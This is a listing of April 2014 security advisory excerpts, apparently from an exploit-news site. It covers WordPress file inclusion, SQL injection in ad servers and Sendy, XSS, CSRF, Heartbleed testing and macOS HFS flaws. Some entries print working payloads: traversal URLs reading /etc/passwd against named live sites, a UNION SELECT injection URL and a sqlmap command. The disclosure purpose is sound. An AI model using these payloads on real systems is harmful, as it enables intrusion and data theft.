WordPress LineNity Local File Inclusion

23 April 2014 - Source: http://www.mondounix.com
[+] Local File Inclusion in WordPress Theme LineNity  
[+] Date: 13/04/2014
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Vendor Homepage: http://themeforest.net/item/linenity-clean-responsive-wordpress-magazine/4417803
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: download.php
[+] Exploit: http://host/wp-content/themes/linenity/functions/download.php?imgurl=[ Local File Inclusion ]
[+] PoC: http://www.mom-o-tron.com/wp-content/themes/linenity/functions/download.php?imgurl=../../../../index.php
         http://sport.ut.ee/wp-content/themes/linenity/functions/download.php?imgurl=../../../../../../../../../../../../../../../etc/passwd
         http://SITE/wp-content/themes/linenity/functions/download.php?imgurl=download.php

...


mAdserve SQL Injection

16 April 2014 - Source: http://www.mondounix.com
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered multiple SQL injection vulnerabilities in mAdserve, which can be 
exploited to execute arbitrary SQL commands in the application's database and compromise the vulnerable website.
 
 
1) SQL Injection in mAdserve: CVE-2014-2654
 
1.1 The vulnerability exists due to insufficient sanitization of user input passed via the "id" HTTP GET parameter to 
the "/www/cp/edit_ad_unit.php" script. A remote authenticated attacker can inject and execute arbitrary SQL commands in 
the application's database and gain complete control over the application.
 
The exploitation example below displays the version of the MySQL server:
 
http://[host]/www/cp/edit_ad_unit.php?id=1%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,version%28%29,13,14,15,16,17%20--%202
 
 
1.2...


Should openssl accept weak DSA/DH keys with g = +/- 1 ?

15 April 2014 - Source: http://www.mondounix.com
openssl accepts DSA (and probably DH) keys with
g=1 (or g= -1). Both are extremely weak, in
practice plaintext.
 
g=1 works all the time
g= -1 works about half the time in DSA
(on vanilla openssl).
 
Is there a MITM implication in this,
e.g. can a MITM convince both parties
that g=1 -- in this case the private keys
won't matter in DH.
 
Attached are certs.
$ openssl x509 -text -in certg=1.pem
G:    1 (0x1)
 
#server
$ openssl s_server -accept 8888 -cert ./certg=1.pem -key certg=1.key -CAfile ./cacert.pem -www
 
#client
$ openssl s_client -connect localhost:8888 -showcerts -CAfile cacert.pem
Verify return code: 0 (ok)
 
-- 
blog:  https://j.ludost.net/blog


...


heartbleed-masstest POC

14 April 2014 - Source: http://www.mondounix.com
#!/usr/bin/env python
 
# Based on the original code by Jared Stafford.
 
# NOTE: this code has been modified to test for OpenSSL versions vulnerable to 
# Heartbleed without exploiting the server, therefore the heartbeat request
# does _not_ cause the server to leak any data from memory or expose any data
# in an unauthorized manner.
# Based on: https://github.com/dchan/metasploit-framework/blob/master/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
# See: https://blog.mozilla.org/security/2014/04/12/testing-for-heartbleed-vulnerability-without-exploiting-the-server/
 
# Usage example: python ssltest.py example.com
 
import sys
import struct
import socket
import time
import select
import re
import threading
import...


Orbit Open Ad Server SQL Injection

10 April 2014 - Source: http://www.mondounix.com
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered a vulnerability in Orbit Open Ad Server, which can be exploited to 
perform SQL Injection attacks, alter SQL requests to the database of the vulnerable application and potentially gain 
control over the vulnerable website.
 
1) SQL Injection in Orbit Open Ad Server: CVE-2014-2540
 
Input passed via the "site_directory_sort_field" HTTP POST parameter to the "/guest/site_directory" URL is not properly 
sanitised before being used in an SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL commands.
 
The PoC code below is based on DNS Exfiltration technique and may be used if the database of the vulnerable application...


Sendy 1.1.9.1 – SQL Injection Vulnerability

10 April 2014 - Source: http://www.mondounix.com
Sendy contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /send-to script not 
properly sanitizing user-supplied input to the "c" parameter. This may allow a remote attacker to inject or manipulate 
SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
 
Proofs:
 
# sqlmap -u 'http://server1/send-to?i=1&c=10' --cookie="version=1.1.9.1; PHPSESSID=[phpsessid value]; 
logged_in=[logged_in value]" -p c -D sendy --tables
 
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is...


MacOSX 10.9.2/XNU HFS Multiple Vulnerabilities

7 April 2014 - Source: http://www.mondounix.com
MacOSX/XNU HFS Multiple Vulnerabilities
Maksymilian Arciemowicz
http://cxsecurity.com/
http://cifrex.org/
 
===================
 
On November 8th, I reported a vulnerability in hard links for HFS+
(CVE-2013-6799)
 
http://cxsecurity.com/issue/WLB-2013110059
 
The HFS+ file system does not apply strict privilege rules during the
creation of hard links. The ability to create hard links to directories is
wrongly implemented, and this issue affects OS versions greater than or
equal to 10.5. Officially Apple allows you to create hard links only for
your Time Machine. <see wiki> Vulnerability CVE-2013-6799 (incomplete fix
for CVE-2010-0105) allows creating a hard link to a directory, and the number of
hard links...


Drupal 7.26 Custom Search 7.x-1.13 Cross Site Scripting

3 April 2014 - Source: http://www.mondounix.com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
Vulnerability Report
 
 
Author: Justin C. Klein Keane <justin@madirish.net>
Reported: 19 Feb, 2014
 
 
Description of Vulnerability:
-----------------------------
Drupal (http://drupal.org) is a robust content management system (CMS)
written in PHP and MySQL.  The Custom Search module "alters the default
search box in many ways. If you need to have options available like in
advanced search, but directly in the search box, this module is for
you."  The Drupal Custom Search module
(https://drupal.org/project/custom_search) contains a persistent cross
site scripting (XSS) vulnerability due to the fact that it fails to
sanitize filter labels...


WordPress Js-Multi-Hotel 2.2.1 XSS / DoS / Disclosure / Abuse

3 April 2014 - Source: http://www.mondounix.com
Hello list!
 
There are multiple vulnerabilities in the Js-Multi-Hotel plugin for WordPress. 
Earlier I wrote about two other vulnerabilities.
 
These are Abuse of Functionality, Denial of Service, Cross-Site Scripting 
and Full Path Disclosure vulnerabilities in the Js-Multi-Hotel plugin for 
WordPress. There are many more vulnerabilities in this plugin (including 
dangerous holes), so after two advisories I'll write new advisories.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Js-Multi-Hotel 2.2.1 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Joomlaskin
http://www.joomlaskin.it
 
-------------------------
Affected...


WordPress XCloner 3.1.0 Cross Site Request Forgery

3 April 2014 - Source: http://www.mondounix.com
Advisory ID: HTB23206
Product: XCloner Wordpress plugin
Vendor: XCloner
Vulnerable Version(s): 3.1.0 and probably prior
Tested Version: 3.1.0
Advisory Publication:  March 12, 2014  [without technical details]
Vendor Notification: March 12, 2014 
Vendor Patch: March 13, 2014 
Public Disclosure: April 2, 2014 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2014-2340
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech...
